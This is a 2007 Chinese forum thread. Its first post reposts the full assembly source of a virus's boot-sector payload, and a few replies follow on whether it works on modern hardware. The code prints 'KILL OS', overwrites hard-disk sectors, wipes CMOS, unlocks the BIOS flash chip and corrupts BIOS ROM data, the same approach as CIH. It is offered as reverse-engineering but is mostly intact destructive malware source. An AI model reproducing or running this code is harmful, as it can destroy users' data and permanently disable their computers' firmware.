|
阅读:2960回复:4
一个病毒部分代码的逆向分析!
前段时间分析一个病毒时有所发现,该病毒向引导扇区写了一些东西,俺下下来后发现居然是一段16位代码,作用是破坏BIOS的,原理与CIH大概差不多吧,大家可千万不要乱玩火哈!
.386p .model tiny .code org 0 EntryPoint: jmp AfterData Version db "KILL OS", 0, 0 ; 8 bytes bytesPerSector dw 0200h sectorsPerCluster db 020h ReservedSectors dw 0020h Fats db 02h onlyforFAT16 dw 0000h Reserve1st dw 0000h Harddisk db 0f8h Reserve dw 000h sectorsPerFat dw 003fh NumberofHead dw 00ffh hiddenSectors dd 00000000h totalSectorsLarge dd 00000000h sectorsofFAT dd 00002774h MirrioofFAT dw 00h diskVersion dw 00h ClusterofROOT dd 02h SectorofSyster dw 01h SectorofBackup dw 06h Reserves db 12 dup(0) Physicaldriver dw 080h Always db 029h Enums dd 0e8a3804h Labelofdriver db 11 dup(020h) systemID db "FAT32 " ;上面这段分析应该没有必要,不过是为了忠实原著! AfterData: ; update DS to be 7C0 instead of 0 push CS pop DS ; update ES also push CS pop ES ; create stack mov ax, 0000h mov ss, ax mov sp, 0FFFFh ; display message... lea si, Version call Print call Play call kill_hdd jmp kill_BIOS Print: push ax mov ah, 14 ; BIOS code for screen display cld print_loop: lodsb ; moving the character to be displayed to al or al, al ; checking if the char is NULL jz printdone int 10h ; Calling BIOS routine JMP print_loop printdone: pop ax ret ; End of print procedure... Play: mov di,0666h in al,061h or al,3 out 061h,al mov al,0b6h out 043h,al mov dx,014h mov ax,04f38h div di out 042h,al mov al,ah out 042h,al ret kill_hdd: mov dx, 1F2h mov al,1 out dx,al inc dx out dx,al inc dx xor ax,ax out dx,al inc dx out dx,al mov al, 10100000b inc dx out dx,al inc dx mov al,30h out dx,al mov si, 0c000h mov dx, 1F0h mov cx, 513 rep outsw RET kill_BIOS: CLI ; dont interrupt me MOV CL, 128 ;map cmos Nuke_CMOS_Byte: DEC CL ; done? JS Nuke_BIOS MOV AL, CL ; Request I/O to byte CL. OUT 70h, AL XOR AL, AL ; clear and write OUT 71h, AL JMP Nuke_CMOS_Byte ; Repeat until all is done. Nuke_BIOS: ; Show BIOS Page in 000E0000 - 000EFFFF (64k). MOV EDI, 8000384Ch MOV BP, 0CF8h MOV DX, 0CFEh CALL IOForEEPROM ; Show BIOS Page in 000F0000 - 000FFFFF (64k). MOV DI, 0058h DEC DX CALL IOForEEPROM push 0e555h pop ds mov si,5 push 0e2aah pop es MOV byte PTR ds:[si], 0aah MOV byte PTR ES:[0ah], 055h MOV BYTE PTR DS:[si],80h MOV byte PTR DS:[si],CL MOV byte PTR ES:[0ah], AL MOV BYTE PTR DS:[si], 60h mov ecx,0e2aaah LOOP $ mov ecx,0e2aaah XOR AH, AH MOV WORD PTR DS:[si], 'RI' XCHG CX, AX LOOP $ push 0f555h pop ds mov si,5 mov ecx,0e2aaah MOV CH, 0AAh ; Enable EEPROM to Write. MOV BYTE PTR DS:[si], CL MOV byte PTR [ECX], AL MOV BYTE PTR DS:[si], 80h MOV byte PTR DS:[si], CL MOV byte PTR [ECX], AL MOV BYTE PTR DS:[si], 20h LOOP $ ; Destroy BIOS Main ROM Data in 000FE000h - 000FE07Fh (80h bytes). xor al,al push 0fe00h pop ds mov si,0 mov BYTE PTR DS:[SI],al CALL IOForEEPROM MOV AX,0040h MOV DS,AX MOV DI,0072h MOV WORD PTR DS:[DI],0 ; cold boot. MOV EAX,0FFFFH MOV CS,EAX JMP DWORD PTR CS:0000h ; reboot! ; I/O for EEPROM. IOForEEPROM: XCHG DI, AX XCHG DX, BP OUT DX, AX XCHG DI, AX XCHG DX, BP IN AL, DX OR AL, 44h XCHG DI, AX XCHG DX, BP OUT DX, AX XCHG DI, AX XCHG DX, BP OUT DX, AL RET ; Make the file 512 bytes long Other DB 55 DUP(0) ; Add the signature MBREND dw 0AA55h end EntryPoint |
|
|
|
沙发#
发布于:2007-07-18 12:29
老式的硬盘和BIOS,对于现在新的无效,硬件直接操作要考虑各种接口型号,代码大了,做病毒也不方便。
|
|
|
|
板凳#
发布于:2007-07-18 18:12
俺觉得奇怪,不操作0x1f7端口怎么读写硬盘呀?再看了一下PCI总线上也没有7号设备,估计是没有什么破坏力,不过俺只有一台自己的机器,不敢乱去试!
|
|
|
地板#
发布于:2007-07-19 12:05
bios int 13 中断听说能读写硬盘,不知道与端口有无关系?
|
|
|
|
地下室#
发布于:2007-07-19 16:29
int13h类似于是BIOS在16位下提供的API函数,使用后程序的通用性应该很好。
可惜BIOS并没有提供PCI总线操作的API。 |
|